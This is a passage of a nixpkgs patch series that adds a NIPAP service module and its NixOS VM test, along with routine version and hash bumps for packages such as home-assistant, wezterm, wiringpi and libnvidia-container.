pkg.pythonPath; + }; + serviceConfig = defaultServiceConfig; + script = + let + bind = + if cfg.nipap-www.unixSocket != null then + "unix:${cfg.nipap-www.unixSocket}" + else + "${escapedHost cfg.nipap-www.host}:${toString cfg.nipap-www.port}"; + generateXMLRPC = cfg.nipap-www.xmlrpcURIFile == null; + xmlrpcURIFile = if generateXMLRPC then "${dataDir}/www_xmlrpc_uri" else cfg.nipap-www.xmlrpcURIFile; + in + '' + test -f "${dataDir}/www_secret" || { + umask 0077 + ${pkg.python}/bin/python -c "import secrets; print(secrets.token_hex())" > "${dataDir}/www_secret" + } + export FLASK_SECRET_KEY="$(cat "${dataDir}/www_secret")" + + # Ensure that we have an XMLRPC URI. + ${ + if generateXMLRPC then + '' + test -f "${dataDir}/www_xmlrpc_uri" || { + umask 0077 + www_password="$(${pkg.python}/bin/python -c "import secrets; print(secrets.token_hex())")" + ${cfg.nipapd.package}/bin/nipap-passwd add --username nipap-www --password "''${www_password}" --name "User account for the web UI" --trusted + + echo "http://nipap-www@${defaultAuthBackend}:''${www_password}@${escapedHost cfg.settings.nipapd.listen}:${toString cfg.settings.nipapd.port}" > "${xmlrpcURIFile}" + } + '' + else + "" + } + export FLASK_XMLRPC_URI="$(cat "${xmlrpcURIFile}")" + + exec "${pkg.gunicorn}/bin/gunicorn" \ + --preload --workers ${toString cfg.nipap-www.workers} \ + --pythonpath "${pkg}/${pkg.python.sitePackages}" \ + --bind ${bind} --umask ${cfg.nipap-www.umask} \ + "nipapwww:create_app()" + ''; + }; + }) + ] + ); + + meta.maintainers = with lib.maintainers; [ lukegb ]; +} diff --git a/pkgs/development/python-modules/flask-xml-rpc-re/default.nix b/pkgs/development/python-modules/flask-xml-rpc-re/default.nix index ed85b18fab09..fd018de05e11 100644 --- a/pkgs/development/python-modules/flask-xml-rpc-re/default.nix +++ b/pkgs/development/python-modules/flask-xml-rpc-re/default.nix @@ -30,8 +30,10 @@ buildPythonPackage rec { nose2 ]; - checkPhase = '' + installCheckPhase = '' + runHook preInstallCheck nose2 -v + runHook postInstallCheck ''; pythonImportsCheck = [ "flask_xmlrpcre" ]; diff --git a/pkgs/servers/sql/postgresql/ext/ip4r.nix b/pkgs/servers/sql/postgresql/ext/ip4r.nix index 277ec10618a6..142ea551c03f 100644 --- a/pkgs/servers/sql/postgresql/ext/ip4r.nix +++ b/pkgs/servers/sql/postgresql/ext/ip4r.nix @@ -1,6 +1,5 @@ { fetchFromGitHub, - gitUpdater, lib, postgresql, postgresqlBuildExtension, From 9f7948fbecd670768e1372773a301d21916c6bb0 Mon Sep 17 00:00:00 2001 From: Luke Granger-Brown Date: Sun, 22 Jun 2025 23:54:07 +0100 Subject: [PATCH 16/73] nixosTests.nipap: init nipap test --- nixos/tests/all-tests.nix | 1 + nixos/tests/web-apps/nipap.nix | 69 +++++++++++++++++++++++++++ pkgs/by-name/ni/nipap-cli/package.nix | 3 ++ pkgs/by-name/ni/nipap-www/package.nix | 2 + 4 files changed, 75 insertions(+) create mode 100644 nixos/tests/web-apps/nipap.nix diff --git a/nixos/tests/all-tests.nix b/nixos/tests/all-tests.nix index 60d118cba38f..7ef46a25e9cb 100644 --- a/nixos/tests/all-tests.nix +++ b/nixos/tests/all-tests.nix @@ -938,6 +938,7 @@ in nginx-unix-socket = runTest ./nginx-unix-socket.nix; nginx-variants = import ./nginx-variants.nix { inherit pkgs runTest; }; nifi = runTestOn [ "x86_64-linux" ] ./web-apps/nifi.nix; + nipap = runTest ./web-apps/nipap.nix; nitter = runTest ./nitter.nix; nix-config = runTest ./nix-config.nix; nix-ld = runTest ./nix-ld.nix; diff --git a/nixos/tests/web-apps/nipap.nix b/nixos/tests/web-apps/nipap.nix new file mode 100644 index 000000000000..bb6f77a1e9d1 --- /dev/null +++ b/nixos/tests/web-apps/nipap.nix @@ -0,0 +1,69 @@ +{ pkgs, lib, ... }: + +let + nipapRc = pkgs.writeText "nipaprc" '' + [global] + hostname = [::1] + port = 1337 + username = nixostest + password = nIx0st3st + default_vrf_rt = - + default_list_vrf_rt = all + ''; +in +{ + name = "lukegb"; + meta.maintainers = [ lib.maintainers.lukegb ]; + + nodes.main = + { ... }: + { + services.nipap = { + enable = true; + }; + + environment.systemPackages = [ + pkgs.nipap-cli + ]; + }; + + testScript = '' + main.wait_for_unit("nipapd.service") + main.wait_for_unit("nipap-www.service") + + # Make sure the web UI is up. + main.wait_for_open_port(21337) + main.succeed("curl -fvvv -Ls http://localhost:21337/ | grep 'NIPAP'") + + # Check that none of the files we created in /var/lib/nipap are readable. + out = main.succeed("ls -l /var/lib/nipap") + bad_perms = False + for ln in out.split("\n"): + ln = ln.strip() + if not ln or ln.startswith('total '): + continue + if not ln.startswith('-rw------- '): + print(f"Bad file permissions: {ln}") + bad_perms = True + if bad_perms: + t.fail("One or more files were overly permissive.") + + # Check we created a web-frontend user. + main.succeed("nipap-passwd list | grep nipap-www") + + # Create a test user + main.succeed("nipap-passwd add -u nixostest -p nIx0st3st -n 'NixOS Test User'") + + # Try to log in with it on the web frontend + main.succeed("curl -fvvv -Ls -b \"\" -d username=nixostest -d password=nIx0st3st http://localhost:21337/auth/login | grep 'PrefixListController'") + + # Try to log in with it using the CLI + main.copy_from_host("${nipapRc}", "/root/.nipaprc") + main.succeed("chmod u=rw,go= /root/.nipaprc") + main.succeed("nipap address add prefix 192.0.2.0/24 type assignment description RFC1166") + main.succeed("nipap address add prefix 192.0.2.1/32 type host description 'test host'") + main.succeed("nipap address add prefix 2001:db8::/32 type reservation description RFC3849") + main.succeed("nipap address add prefix 2001:db8:f00f::/48 type assignment description 'eye pee vee six'") + main.succeed("nipap address add prefix 2001:db8:f00f:face:dead:beef:cafe:feed/128 type host description 'test host 2'") + ''; +} diff --git a/pkgs/by-name/ni/nipap-cli/package.nix b/pkgs/by-name/ni/nipap-cli/package.nix index 4568bfe13755..aeb9f33236bf 100644 --- a/pkgs/by-name/ni/nipap-cli/package.nix +++ b/pkgs/by-name/ni/nipap-cli/package.nix @@ -1,6 +1,7 @@ { lib, python312Packages, + nixosTests, }: let @@ -35,6 +36,8 @@ python3Packages.buildPythonApplication rec { "nipap_cli.nipap_cli" ]; + passthru.tests.nixos = nixosTests.nipap; + meta = { description = "Neat IP Address Planner CLI"; longDescription = '' diff --git a/pkgs/by-name/ni/nipap-www/package.nix b/pkgs/by-name/ni/nipap-www/package.nix index 33355ce94a28..420c7a913da8 100644 --- a/pkgs/by-name/ni/nipap-www/package.nix +++ b/pkgs/by-name/ni/nipap-www/package.nix @@ -1,6 +1,7 @@ { lib, python3Packages, + nixosTests, }: python3Packages.buildPythonApplication rec { @@ -32,6 +33,7 @@ python3Packages.buildPythonApplication rec { passthru = { inherit (python3Packages) gunicorn python; pythonPath = python3Packages.makePythonPath dependencies; + tests.nixos = nixosTests.nipap; }; meta = { From a081327e235368cfc04c6cf0689dec625cdad68d Mon Sep 17 00:00:00 2001 From: Martin Weinelt Date: Mon, 23 Jun 2025 22:53:46 +0200 Subject: [PATCH 17/73] python3Packages.aioamazondevices: 3.1.12 -> 3.1.14 https://github.com/chemelli74/aioamazondevices/blob/v3.1.14/CHANGELOG.md --- pkgs/development/python-modules/aioamazondevices/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/development/python-modules/aioamazondevices/default.nix b/pkgs/development/python-modules/aioamazondevices/default.nix index f9c3347fffb2..ac6ed8e10565 100644 --- a/pkgs/development/python-modules/aioamazondevices/default.nix +++ b/pkgs/development/python-modules/aioamazondevices/default.nix @@ -16,14 +16,14 @@ buildPythonPackage rec { pname = "aioamazondevices"; - version = "3.1.12"; + version = "3.1.14"; pyproject = true; src = fetchFromGitHub { owner = "chemelli74"; repo = "aioamazondevices"; tag = "v${version}"; - hash = "sha256-nilYImyK057/yO/pnnhM9S+vRcslLLKTsYIzGNFM2UQ="; + hash = "sha256-xCXzNeUIw2UxBcOMgab1lpN9/0RGLZAwgtHkZhwqxxY="; }; build-system = [ poetry-core ]; From 9844427d4f9a5601d6a6353ca19547478213a541 Mon Sep 17 00:00:00 2001 From: Martin Weinelt Date: Mon, 23 Jun 2025 22:55:03 +0200 Subject: [PATCH 18/73] python3Packages.aioesphomeapi: 32.2.1 -> 33.1.1 https://github.com/esphome/aioesphomeapi/releases/tag/v33.1.1 --- pkgs/development/python-modules/aioesphomeapi/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/development/python-modules/aioesphomeapi/default.nix b/pkgs/development/python-modules/aioesphomeapi/default.nix index b3c309d11b75..9aca8a3b8be2 100644 --- a/pkgs/development/python-modules/aioesphomeapi/default.nix +++ b/pkgs/development/python-modules/aioesphomeapi/default.nix @@ -26,7 +26,7 @@ buildPythonPackage rec { pname = "aioesphomeapi"; - version = "32.2.1"; + version = "33.1.1"; pyproject = true; disabled = pythonOlder "3.9"; @@ -35,7 +35,7 @@ buildPythonPackage rec { owner = "esphome"; repo = "aioesphomeapi"; tag = "v${version}"; - hash = "sha256-1ZepZJdJosPPdFhx8PwArIaoz415GfA1vfc3JJ77LNo="; + hash = "sha256-vXBTumh1oB1vTVlX4VJvIUTnkYLG9j/8cNuHFQ2PklY="; }; build-system = [ From 9ffbe82e18e641abe85c7e5570f42c71dbf1f1b3 Mon Sep 17 00:00:00 2001 From: "R. RyanTM" Date: Tue, 24 Jun 2025 06:57:20 +1000 Subject: [PATCH 19/73] python3Packages.bthome-ble: 3.13.0 -> 3.13.1 (#416937) https://github.com/bluetooth-devices/bthome-ble/blob/v3.13.1/CHANGELOG.md Co-Authored-By: Fabian Affolter --- pkgs/development/python-modules/bthome-ble/default.nix | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/pkgs/development/python-modules/bthome-ble/default.nix b/pkgs/development/python-modules/bthome-ble/default.nix index 15a164235268..5d9294e1b658 100644 --- a/pkgs/development/python-modules/bthome-ble/default.nix +++ b/pkgs/development/python-modules/bthome-ble/default.nix @@ -8,23 +8,20 @@ poetry-core, pytest-cov-stub, pytestCheckHook, - pythonOlder, pytz, sensor-state-data, }: buildPythonPackage rec { pname = "bthome-ble"; - version = "3.13.0"; + version = "3.13.1"; pyproject = true; - disabled = pythonOlder "3.9"; - src = fetchFromGitHub { owner = "Bluetooth-Devices"; repo = "bthome-ble"; tag = "v${version}"; - hash = "sha256-e6R3Qjj82z0E+gIxqDVM08Op3KlK9ZG1iNmkqqIEjWY="; + hash = "sha256-oGFjWe9e386EPAJGKL8Qk55iXoyW3rXuyG7ElyQYurg="; }; build-system = [ poetry-core ]; From b3ea12521f362a9201da2c4b506225ed743ad593 Mon Sep 17 00:00:00 2001 From: Martin Weinelt Date: Mon, 23 Jun 2025 22:59:00 +0200 Subject: [PATCH 20/73] python3Packages.deebot-client: 13.3.0 -> 13.4.0 https://github.com/DeebotUniverse/client.py/releases/tag/13.4.0 --- pkgs/development/python-modules/deebot-client/default.nix | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/pkgs/development/python-modules/deebot-client/default.nix b/pkgs/development/python-modules/deebot-client/default.nix index 4b7d0bc16279..18ae5e569c1f 100644 --- a/pkgs/development/python-modules/deebot-client/default.nix +++ b/pkgs/development/python-modules/deebot-client/default.nix @@ -20,7 +20,7 @@ buildPythonPackage rec { pname = "deebot-client"; - version = "13.3.0"; + version = "13.4.0"; pyproject = true; disabled = pythonOlder "3.13"; @@ -29,12 +29,12 @@ buildPythonPackage rec { owner = "DeebotUniverse"; repo = "client.py"; tag = version; - hash = "sha256-dnh+3/viaaxlx3H0ceDH1N72kC1HBC7Szz+Gb6ryUJM="; + hash = "sha256-CEE6RDcYQLJ9a8QFYpCURYV8hvs0mLK8R+p68OfHKWQ="; }; cargoDeps = rustPlatform.fetchCargoVendor { inherit pname version src; - hash = "sha256-v8FtW1gPoPfOpcxUrM7g0LKR8k0VPR13hsHCPT8uLzs="; + hash = "sha256-0WdRkF5UAaPQS3A9DiAe9BuqF0aAaU0c2C0BU3Ue4n0="; }; pythonRelaxDeps = [ From 8798c7d006ff932da93782f8dfd2dd1572f7e9d4 Mon Sep 17 00:00:00 2001 From: Martin Weinelt Date: Mon, 23 Jun 2025 22:59:56 +0200 Subject: [PATCH 21/73] python3Packages.homematicip: 2.0.5 -> 2.0.6 https://github.com/hahn-th/homematicip-rest-api/releases/tag/2.0.6 --- pkgs/development/python-modules/homematicip/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/development/python-modules/homematicip/default.nix b/pkgs/development/python-modules/homematicip/default.nix index fb1feb4dc972..86f9eadefbe9 100644 --- a/pkgs/development/python-modules/homematicip/default.nix +++ b/pkgs/development/python-modules/homematicip/default.nix @@ -16,7 +16,7 @@ buildPythonPackage rec { pname = "homematicip"; - version = "2.0.5"; + version = "2.0.6"; pyproject = true; disabled = pythonOlder "3.12"; @@ -25,7 +25,7 @@ buildPythonPackage rec { owner = "hahn-th"; repo = "homematicip-rest-api"; tag = version; - hash = "sha256-WvE5JTpAjRGLP7haIwD5hKOvz3hM7paV2jyds/yCxg8="; + hash = "sha256-HV+4ZmYr6LsSBbQnr4PUD2u0y6uWxuCMUgNh7gG9IH8="; }; build-system = [ From 24b5437818010d3fa52902f353815d950bd12b03 Mon Sep 17 00:00:00 2001 From: Martin Weinelt Date: Mon, 23 Jun 2025 23:00:21 +0200 Subject: [PATCH 22/73] python3Packages.zigpy-zigate: 0.13.2 -> 0.13.3 https://github.com/zigpy/zigpy-zigate/releases/tag/0.13.3 --- pkgs/development/python-modules/zigpy-zigate/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/development/python-modules/zigpy-zigate/default.nix b/pkgs/development/python-modules/zigpy-zigate/default.nix index 589178993688..9cb5c4f4b1ab 100644 --- a/pkgs/development/python-modules/zigpy-zigate/default.nix +++ b/pkgs/development/python-modules/zigpy-zigate/default.nix @@ -16,7 +16,7 @@ buildPythonPackage rec { pname = "zigpy-zigate"; - version = "0.13.2"; + version = "0.13.3"; pyproject = true; disabled = pythonOlder "3.8"; @@ -25,7 +25,7 @@ buildPythonPackage rec { owner = "zigpy"; repo = "zigpy-zigate"; tag = version; - hash = "sha256-MlAX7dcRZziMYCpG64OemZ8czwvDXpdoRaDVo1sUCno="; + hash = "sha256-reOt0bPPkKDKeu8CESJtLDEmpkOmgopXk65BqBlBIhY="; }; postPatch = '' From 624c224795906207ba12de0a9c748ae8375a70f0 Mon Sep 17 00:00:00 2001 From: Martin Weinelt Date: Mon, 23 Jun 2025 23:02:29 +0200 Subject: [PATCH 23/73] python3Packages.zigpy-znp: 0.14.0 -> 0.14.1 https://github.com/zigpy/zigpy-znp/releases/tag/v0.14.1 --- pkgs/development/python-modules/zigpy-znp/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/development/python-modules/zigpy-znp/default.nix b/pkgs/development/python-modules/zigpy-znp/default.nix index d78132440c01..9be00b700a20 100644 --- a/pkgs/development/python-modules/zigpy-znp/default.nix +++ b/pkgs/development/python-modules/zigpy-znp/default.nix @@ -19,7 +19,7 @@ buildPythonPackage rec { pname = "zigpy-znp"; - version = "0.14.0"; + version = "0.14.1"; pyproject = true; disabled = pythonOlder "3.7"; @@ -28,7 +28,7 @@ buildPythonPackage rec { owner = "zigpy"; repo = "zigpy-znp"; tag = "v${version}"; - hash = "sha256-vYB04vEFqpqrjJMS73mtYXakp7lEIJjB+tT0SF9hpWM="; + hash = "sha256-V662zDUBMbr+cARxrwt8196Ml4zlGEAudR3BtvY96HM="; }; postPatch = '' From ab39869328248d4dae26cee94e7c0c8b9390adf3 Mon Sep 17 00:00:00 2001 From: Martin Weinelt Date: Mon, 23 Jun 2025 23:06:34 +0200 Subject: [PATCH 24/73] python3Packages.zha: 0.0.59 -> 0.0.60 https://github.com/zigpy/zha/releases/tag/0.0.60 --- pkgs/development/python-modules/zha/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/development/python-modules/zha/default.nix b/pkgs/development/python-modules/zha/default.nix index 8395428be649..ef17ff74e575 100644 --- a/pkgs/development/python-modules/zha/default.nix +++ b/pkgs/development/python-modules/zha/default.nix @@ -27,7 +27,7 @@ buildPythonPackage rec { pname = "zha"; - version = "0.0.59"; + version = "0.0.60"; pyproject = true; disabled = pythonOlder "3.12"; @@ -36,7 +36,7 @@ buildPythonPackage rec { owner = "zigpy"; repo = "zha"; tag = version; - hash = "sha256-wddMeXFKk8HBz8Hle5kbRaOkZLOr98HoiHYYlBtuxSA="; + hash = "sha256-Bx6JcVKosf6wXe+LRP9R4iFAva/rJ15JhYchCx2CbJk="; }; postPatch = '' From 1b7c6b61801ad5f2ebff2a2676cd0176d3418463 Mon Sep 17 00:00:00 2001 From: Martin Weinelt Date: Mon, 23 Jun 2025 23:06:40 +0200 Subject: [PATCH 25/73] home-assistant: 2025.6.1 -> 2025.6.2 https://github.com/home-assistant/core/releases/tag/2025.6.2 --- pkgs/servers/home-assistant/component-packages.nix | 2 +- pkgs/servers/home-assistant/default.nix | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/pkgs/servers/home-assistant/component-packages.nix b/pkgs/servers/home-assistant/component-packages.nix index 0617231f1378..a30b759c63f0 100644 --- a/pkgs/servers/home-assistant/component-packages.nix +++ b/pkgs/servers/home-assistant/component-packages.nix @@ -2,7 +2,7 @@ # Do not edit! { - version = "2025.6.1"; + version = "2025.6.2"; components = { "3_day_blinds" = ps: with ps; [ diff --git a/pkgs/servers/home-assistant/default.nix b/pkgs/servers/home-assistant/default.nix index 3fffe4a6faa1..2d2b22448073 100644 --- a/pkgs/servers/home-assistant/default.nix +++ b/pkgs/servers/home-assistant/default.nix @@ -386,7 +386,7 @@ let extraBuildInputs = extraPackages python.pkgs; # Don't forget to run update-component-packages.py after updating - hassVersion = "2025.6.1"; + hassVersion = "2025.6.2"; in python.pkgs.buildPythonApplication rec { @@ -407,13 +407,13 @@ python.pkgs.buildPythonApplication rec { owner = "home-assistant"; repo = "core"; tag = version; - hash = "sha256-Pp2IIpVfzYE4BBJEq4Ll2s0vgsqxAApE8TmVd1zAg38="; + hash = "sha256-5+L687sUD+e8F9UYnFURSUMG2/USuOpNu5a9By0yZ/g="; }; # Secondary source is pypi sdist for translations sdist = fetchPypi { inherit pname version; - hash = "sha256-yc4tEyR3xpo4x9daWEwXFJBhSH3xeOc2ckO+7LWVRlA="; + hash = "sha256-DLqP9/b68ikGuxrvFiJCqguE2WgnKP0HtiU2X7tUbkE="; }; build-system = with python.pkgs; [ From 42271f3d95ddd75ac76088dbae63e7f651939fb0 Mon Sep 17 00:00:00 2001 From: "R. Ryantm" Date: Mon, 23 Jun 2025 22:26:05 +0000 Subject: [PATCH 26/73] tana: 1.0.32 -> 1.0.36 --- pkgs/by-name/ta/tana/package.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/by-name/ta/tana/package.nix b/pkgs/by-name/ta/tana/package.nix index 8a1e3fde0b85..4f8600066f06 100644 --- a/pkgs/by-name/ta/tana/package.nix +++ b/pkgs/by-name/ta/tana/package.nix @@ -62,7 +62,7 @@ let stdenv.cc.cc stdenv.cc.libc ]; - version = "1.0.32"; + version = "1.0.36"; in stdenv.mkDerivation { pname = "tana"; @@ -70,7 +70,7 @@ stdenv.mkDerivation { src = fetchurl { url = "https://github.com/tanainc/tana-desktop-releases/releases/download/v${version}/tana_${version}_amd64.deb"; - hash = "sha256-oAW9Vx4z0TOweKA6bsmCm7DY72pFWBnPLG0dS05oCw8="; + hash = "sha256-dDB2RcTk58IQGqNGepaIvxGhR0/soWWDbBXxnSEYkdw="; }; nativeBuildInputs = [ From dbf79155e6046e7a80e6c37fe1551ad7cab669de Mon Sep 17 00:00:00 2001 From: "R. Ryantm" Date: Mon, 23 Jun 2025 23:06:41 +0000 Subject: [PATCH 27/73] supermariowar: 2024-unstable-2025-04-03 -> 2024-unstable-2025-06-18 --- pkgs/by-name/su/supermariowar/package.nix | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/pkgs/by-name/su/supermariowar/package.nix b/pkgs/by-name/su/supermariowar/package.nix index d98c9d6f6909..507b94324f89 100644 --- a/pkgs/by-name/su/supermariowar/package.nix +++ b/pkgs/by-name/su/supermariowar/package.nix @@ -16,13 +16,13 @@ stdenv.mkDerivation (finalAttrs: { pname = "supermariowar"; - version = "2024-unstable-2025-04-03"; + version = "2024-unstable-2025-06-18"; src = fetchFromGitHub { owner = "mmatyas"; repo = "supermariowar"; - rev = "c0ed774a2415ad45e72bd6086add2a5cbfc88898"; - hash = "sha256-vh8SSMxAOG8f9nyJmKUlA8yb+G61Bfc62dhB2eLdo20="; + rev = "71383b07b99a52b57be79cf371ab718337365019"; + hash = "sha256-PjweE8cGAp8V4LY0/6QzLekQ80Q1qbwDiiSzDirA29s="; fetchSubmodules = true; }; From c50af17f7852ce82d8d3984d659ce34820e1fed8 Mon Sep 17 00:00:00 2001 From: Marco Bulgarini Date: Tue, 24 Jun 2025 06:04:24 +0200 Subject: [PATCH 28/73] wezterm: fix app bundle on darwin Signed-off-by: Marco Bulgarini Co-authored-by: Sizhe Zhao --- pkgs/by-name/we/wezterm/package.nix | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/pkgs/by-name/we/wezterm/package.nix b/pkgs/by-name/we/wezterm/package.nix index 118a02e2c6b8..22d85651a88e 100644 --- a/pkgs/by-name/we/wezterm/package.nix +++ b/pkgs/by-name/we/wezterm/package.nix @@ -119,7 +119,12 @@ rustPlatform.buildRustPackage rec { cp -r assets/macos/WezTerm.app "$OUT_APP" rm $OUT_APP/*.dylib cp -r assets/shell-integration/* "$OUT_APP" - ln -s $out/bin/{wezterm,wezterm-mux-server,wezterm-gui,strip-ansi-escapes} "$OUT_APP" + # https://github.com/wezterm/wezterm/pull/6886 + # macOS will only recognize our application bundle + # if the binaries are inside of it. Move them there + # and create symbolic links for them in bin/. + mv $out/bin/{wezterm,wezterm-mux-server,wezterm-gui,strip-ansi-escapes} "$OUT_APP" + ln -s "$OUT_APP"/{wezterm,wezterm-mux-server,wezterm-gui,strip-ansi-escapes} "$out/bin" ''; passthru = { From ef105f441abeced5abb65ceca7f9daed94371485 Mon Sep 17 00:00:00 2001 From: "R. Ryantm" Date: Tue, 24 Jun 2025 05:21:06 +0000 Subject: [PATCH 29/73] nelm: 1.6.0 -> 1.7.0 --- pkgs/by-name/ne/nelm/package.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/by-name/ne/nelm/package.nix b/pkgs/by-name/ne/nelm/package.nix index d976ad036d6d..38af6902694b 100644 --- a/pkgs/by-name/ne/nelm/package.nix +++ b/pkgs/by-name/ne/nelm/package.nix @@ -9,13 +9,13 @@ }: buildGoModule (finalAttrs: { pname = "nelm"; - version = "1.6.0"; + version = "1.7.0"; src = fetchFromGitHub { owner = "werf"; repo = "nelm"; tag = "v${finalAttrs.version}"; - hash = "sha256-bqVas9zF/xtL5K/7cOF/4q4weZtEBhfB5ngdAq0ZfjI="; + hash = "sha256-XAieAxfpNi2XpjG8lyatAqP13wicx3JFjckgSmiKqjA="; }; vendorHash = "sha256-bx8e5jV+ORnJg/35VwO7qodFjmSf7XbzTKZKp3b8hqc="; From 083009d87284ebc4d90672534356fb7d66c9cff5 Mon Sep 17 00:00:00 2001 From: James Ward Date: Tue, 24 Jun 2025 00:27:19 -0600 Subject: [PATCH 30/73] maintainers/team-list: jetbrains add jamesward --- maintainers/team-list.nix | 1 + 1 file changed, 1 insertion(+) diff --git a/maintainers/team-list.nix b/maintainers/team-list.nix index bdde7f2f5d41..0696cca7818b 100644 --- a/maintainers/team-list.nix +++ b/maintainers/team-list.nix @@ -630,6 +630,7 @@ with lib.maintainers; leona theCapypara thiagokokada + jamesward ]; shortName = "Jetbrains"; scope = "Maintainers of the Jetbrains IDEs in nixpkgs"; From a6e883907839ef0543d7b870a5d7346584a45889 Mon Sep 17 00:00:00 2001 From: Ryan Omasta Date: Tue, 24 Jun 2025 00:43:12 -0600 Subject: [PATCH 31/73] wiringpi: 3.10 -> 3.16 https://github.com/WiringPi/WiringPi/releases/tag/3.16 Diff: https://github.com/WiringPi/WiringPi/compare/3.10...3.16 --- pkgs/by-name/wi/wiringpi/package.nix | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/pkgs/by-name/wi/wiringpi/package.nix b/pkgs/by-name/wi/wiringpi/package.nix index 57d72b67bcbf..b57e32c5d1c5 100644 --- a/pkgs/by-name/wi/wiringpi/package.nix +++ b/pkgs/by-name/wi/wiringpi/package.nix @@ -7,12 +7,12 @@ }: let - version = "3.10"; + version = "3.16"; srcAll = fetchFromGitHub { owner = "WiringPi"; repo = "WiringPi"; - rev = version; - sha256 = "sha256-OWR+yo+SnYaMd8J+ku9ettZi+rDHcHlGZCoucCiRkCI="; + tag = version; + hash = "sha256-NBHmRA+6Os6/IpW8behbgpVjtN8QF9gkffXU2ZVC8ts="; }; mkSubProject = { From 8976f8ad3ba71ea5eaa3ca0dfd39e5b9e1500484 Mon Sep 17 00:00:00 2001 From: Ryan Omasta Date: Tue, 24 Jun 2025 00:45:05 -0600 Subject: [PATCH 32/73] wiringpi: remove `with lib`, add ryand56 as maintainer --- pkgs/by-name/wi/wiringpi/package.nix | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/pkgs/by-name/wi/wiringpi/package.nix b/pkgs/by-name/wi/wiringpi/package.nix index b57e32c5d1c5..fa51adc7e33f 100644 --- a/pkgs/by-name/wi/wiringpi/package.nix +++ b/pkgs/by-name/wi/wiringpi/package.nix @@ -78,11 +78,14 @@ symlinkJoin { passthru.wiringPiD passthru.gpio ]; - meta = with lib; { + meta = { description = "Gordon's Arduino wiring-like WiringPi Library for the Raspberry Pi (Unofficial Mirror for WiringPi bindings)"; homepage = "https://github.com/WiringPi/WiringPi"; - license = licenses.lgpl3Plus; - maintainers = with maintainers; [ doronbehar ]; - platforms = platforms.linux; + license = lib.licenses.lgpl3Plus; + maintainers = with lib.maintainers; [ + doronbehar + ryand56 + ]; + platforms = lib.platforms.linux; }; } From 4fe7209f36a2e9d9cb987b9cc6544e1d46cdc41e Mon Sep 17 00:00:00 2001 From: "R. Ryantm" Date: Tue, 24 Jun 2025 07:34:04 +0000 Subject: [PATCH 33/73] lstr: 0.2.0 -> 0.2.1 --- pkgs/by-name/ls/lstr/package.nix | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/pkgs/by-name/ls/lstr/package.nix b/pkgs/by-name/ls/lstr/package.nix index e412a55f7714..4561ace0098c 100644 --- a/pkgs/by-name/ls/lstr/package.nix +++ b/pkgs/by-name/ls/lstr/package.nix @@ -11,16 +11,16 @@ rustPlatform.buildRustPackage (finalAttrs: { pname = "lstr"; - version = "0.2.0"; + version = "0.2.1"; src = fetchFromGitHub { owner = "bgreenwell"; repo = "lstr"; tag = "v${finalAttrs.version}"; - hash = "sha256-Bg2tJYnXpJQasmcRv+ZIZAVteKUCuTgFKVRHw1CCiAQ="; + hash = "sha256-uaefVDSTphboWW1BP2HkcuMiW87FmnVYxCthlrAKF5Y="; }; - cargoHash = "sha256-KlO/Uz9UPea4DFC6U4hvn4kOWSzUmYmckw+IUstcmeQ="; + cargoHash = "sha256-UVaqkNV1cNpbCNphk6YMqOz077xY9dUBgCGt7SLIH0U="; nativeBuildInputs = [ pkg-config ]; From 0c909a5522020455d518a7f028e4850d55080bf6 Mon Sep 17 00:00:00 2001 From: Paul Meyer Date: Tue, 24 Jun 2025 10:27:40 +0200 Subject: [PATCH 34/73] libnvidia-container: 1.17.6 -> 1.17.8 Signed-off-by: Paul Meyer --- .../0001-ldcache-don-t-use-ldcache.patch | 26 ++++++++++--------- ...dia-docker-compatible-binary-lookups.patch | 2 +- .../li/libnvidia-container/package.nix | 4 +-- 3 files changed, 17 insertions(+), 15 deletions(-) diff --git a/pkgs/by-name/li/libnvidia-container/0001-ldcache-don-t-use-ldcache.patch b/pkgs/by-name/li/libnvidia-container/0001-ldcache-don-t-use-ldcache.patch index 1a26140b8bee..35210d9b81cf 100644 --- a/pkgs/by-name/li/libnvidia-container/0001-ldcache-don-t-use-ldcache.patch +++ b/pkgs/by-name/li/libnvidia-container/0001-ldcache-don-t-use-ldcache.patch @@ -8,8 +8,8 @@ This patch hinders libnvidia-container from using the loader cache, which doesn' src/ldcache.c | 46 +++++++++++++++++----------------------------- src/ldcache.h | 2 +- src/nvc_info.c | 8 ++------ - src/nvc_ldcache.c | 2 +- - 4 files changed, 21 insertions(+), 37 deletions(-) + src/nvc_ldcache.c | 4 ++-- + 4 files changed, 22 insertions(+), 38 deletions(-) diff --git a/src/ldcache.c b/src/ldcache.c index 38bab0553208f66b2866ccea6cdb0faca4357f19..1c4acd52b622be4ca6accdc80da5a6fcf9ae67dd 100644 @@ -86,7 +86,7 @@ index 33d78dd7e21f65eb696535c115bbd2839a6c67ca..2b087dbca1a6a2946cd495e676a61e95 #endif /* HEADER_LDCACHE_H */ diff --git a/src/nvc_info.c b/src/nvc_info.c -index b7b8adfa7c79c326a1acb481a06a05d1463e810f..cf4b1905fd2127c28ee16649501be122d3be5261 100644 +index bcc887b2345bd42a098f9b85d9c66fae2775f736..5eaef61ada5e955ab11c6a4eb8429c50468e3370 100644 --- a/src/nvc_info.c +++ b/src/nvc_info.c @@ -217,15 +217,13 @@ find_library_paths(struct error *err, struct dxcore_context *dxcore, struct nvc_ @@ -122,15 +122,17 @@ index 